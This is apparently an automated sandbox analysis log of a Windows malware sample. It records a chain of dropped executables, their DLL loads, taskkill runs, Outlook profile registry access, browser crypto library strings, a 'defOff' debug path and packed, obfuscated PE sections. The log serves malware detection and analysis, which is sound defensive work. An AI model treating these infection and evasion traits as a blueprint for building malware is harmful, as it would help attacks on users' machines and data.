Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: dui70.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: duser.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: chartv.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: oleacc.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: winsta.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: textshaping.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 1798144 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of loxwmvpm is bigger than: 0x100000 < 0x19cc00
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: feb3d39b6a.exe, 00000013.00000002.3346267958.0000000005FF2000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW;
Source: C:\Users\user\Documents\JKECGDBFCB.exe Unpacked PE file: 14.2.JKECGDBFCB.exe.510000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 15.2.skotes.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 16.2.skotes.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 17.2.skotes.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Unpacked PE file: 18.2.2533b4b8c7.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsoyaldh:EW;uhxnkltw:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Unpacked PE file: 19.2.feb3d39b6a.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Unpacked PE file: 20.2.815f2a8fe8.exe.bb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Unpacked PE file: 22.2.feb3d39b6a.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Unpacked PE file: 37.2.815f2a8fe8.exe.bb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: feb3d39b6a.exe.17.dr Static PE information: real checksum: 0x1da749 should be: 0x1d5fe1
Source: 57a07eec2d.exe.17.dr Static PE information: real checksum: 0x2b1461 should be: 0x2b9d9b
Source: random[1].exe0.17.dr Static PE information: real checksum: 0x1e92b0 should be: 0x1e67a3
Source: random[2].exe0.17.dr Static PE information: real checksum: 0x2b1461 should be: 0x2b9d9b
Source: random[1].exe1.17.dr Static PE information: real checksum: 0x1da749 should be: 0x1d5fe1
Source: random[1].exe.0.dr Static PE information: real checksum: 0x3284f4 should be: 0x330bf4
Source: 815f2a8fe8.exe.17.dr Static PE information: real checksum: 0x1bc6e1 should be: 0x1c4b12
Source: random[1].exe.17.dr Static PE information: real checksum: 0x1bc6e1 should be: 0x1c4b12
Source: skotes.exe.14.dr Static PE information: real checksum: 0x3284f4 should be: 0x330bf4
Source: JKECGDBFCB.exe.0.dr Static PE information: real checksum: 0x3284f4 should be: 0x330bf4
Source: file.exe Static PE information: real checksum: 0x1bc6e1 should be: 0x1c4b12
Source: 2533b4b8c7.exe.17.dr Static PE information: real checksum: 0x1e92b0 should be: 0x1e67a3
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: loxwmvpm
Source: file.exe Static PE information: section name: lrozqijg
Source: file.exe Static PE information: section name: .taggant
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: hjzxticg
